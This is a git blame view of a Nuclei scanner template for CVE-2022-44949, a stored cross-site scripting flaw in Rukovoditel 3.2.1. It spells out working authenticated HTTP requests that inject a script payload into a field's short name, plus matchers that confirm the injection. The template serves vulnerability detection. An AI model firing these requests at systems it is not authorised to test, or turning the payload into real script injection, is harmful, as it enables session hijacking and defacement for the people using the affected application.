daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-44949.yaml

137 lines
4.7 KiB
YAML
Raw Normal View History

templates added
2023-07-07 09:38:49 +00:00
id: CVE-2022-44949
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.
templates added
2023-07-07 09:38:49 +00:00
reference:
- https://github.com/anhdq201/rukovoditel/issues/12
- http://rukovoditel.com/
- https://nvd.nist.gov/vuln/detail/CVE-2022-44949
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- http://rukovoditel.com
templates added
2023-07-07 09:38:49 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-44949
cwe-id: CWE-79
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot:
2023-12-12 11:07:52 +00:00
epss-score: 0.00091
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot:
2024-01-14 13:49:27 +00:00
epss-percentile: 0.38514
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*
templates added
2023-07-07 09:38:49 +00:00
metadata:
verified: true
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
max-request: 3
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
vendor: rukovoditel
product: rukovoditel
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,intrusive
templates added
2023-07-07 09:38:49 +00:00
http:
- raw:
- |
GET /index.php?module=users/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php?module=users/login&action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_session_token={{nonce}}&username={{username}}&password={{password}}
- |
POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="form_session_token"
{{nonce}}
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="entities_id"
24
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="forms_tabs_id"
29
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="name"
test
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="short_name"
<script>alert(document.domain)</script>
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="type"
fieldtype_input
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[width]"
input-small
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[default_value]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[is_unique]"
0
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="fields_configuration[unique_error_msg]"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="required_message"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="tooltip_item_page"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access_template"
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[5]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="access[4]"
yes
------WebKitFormBoundaryfKx13B5QBU5Sccgf
Content-Disposition: form-data; name="notes"
------WebKitFormBoundaryfKx13B5QBU5Sccgf--
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- status_code_3 == 200
- contains(content_type_3, "text/html")
- contains(body_3, "<script>alert(document.domain)</script>")
- contains(body_3, "rukovoditel")
templates added
2023-07-07 09:38:49 +00:00
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- id="form_session_token" value="(.*)" type="hidden"
templates added
2023-07-07 09:38:49 +00:00
internal: true
Auto Template Signing [Sun Jan 14 14:05:19 UTC 2024] :robot:
2024-01-14 14:05:19 +00:00
# digest: 490a0046304402202a277adf325e907783948f58e835f246217081350a975f1aa8363c3c3afc832402207467c7b3e8b41142a2730377d5b9612d853d1b5936be83d0bc98f393580abb24:922c64590222798bb761d5b6d8e72950